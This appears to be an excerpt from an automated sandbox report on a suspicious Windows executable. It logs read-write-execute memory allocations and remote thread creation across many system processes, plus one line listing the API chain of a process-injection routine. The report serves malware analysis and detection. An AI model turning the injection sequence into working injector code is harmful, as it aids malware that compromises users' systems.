        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 230000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 620000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 600000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: C50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: BA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dllhost.exe base: D60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: FE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: FB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 230000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 700000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: DC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 490000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 970000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 890000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: DD60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 380000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: AD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 6C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 200000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 930000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1010000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 240000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 630000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 610000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: C60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: BB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dllhost.exe base: D70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: C00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: FF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: FC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 240000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 710000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: DD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 4A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 980000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 8A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: DD70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_0242CC92 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,FindCloseChangeNotification,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification,CloseHandle,GetProcessHeap,HeapFree
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 29B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: C90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: CE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 21D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2220000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2AD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2B20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2D40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2D90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2C40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2C90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2A80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2BD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1480000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 3230000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: E70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: E80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 890000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 21C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2E00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2E50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2540000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2690000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2CE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2CF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2BF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2C40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 28C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2910000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 21E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2230000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: ED0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: F20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2AB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2B00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: B20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: B30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2110000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2160000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2AD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2C20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 810000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 820000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2A60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2A70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1200000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1210000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: F50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: F60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 23B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2400000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: B80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: B90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 7D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 7E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2EC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2F10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1150000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1160000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: D50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: D60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 25E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2640000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2D40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2D50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2B10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2C60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 11E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 11F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 11D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 11E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 670000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 680000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 810000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 820000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 14A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 14B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: E60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: E70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 8B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 8C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 860000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 870000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 24A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 24F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 9B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: A00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: AF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: B00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: B00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: B10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: D20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: D30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1260000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1270000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: FB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: FC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: E50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: E60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 12A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 12B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2080000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2090000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2F00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2F50000Jump to behavior
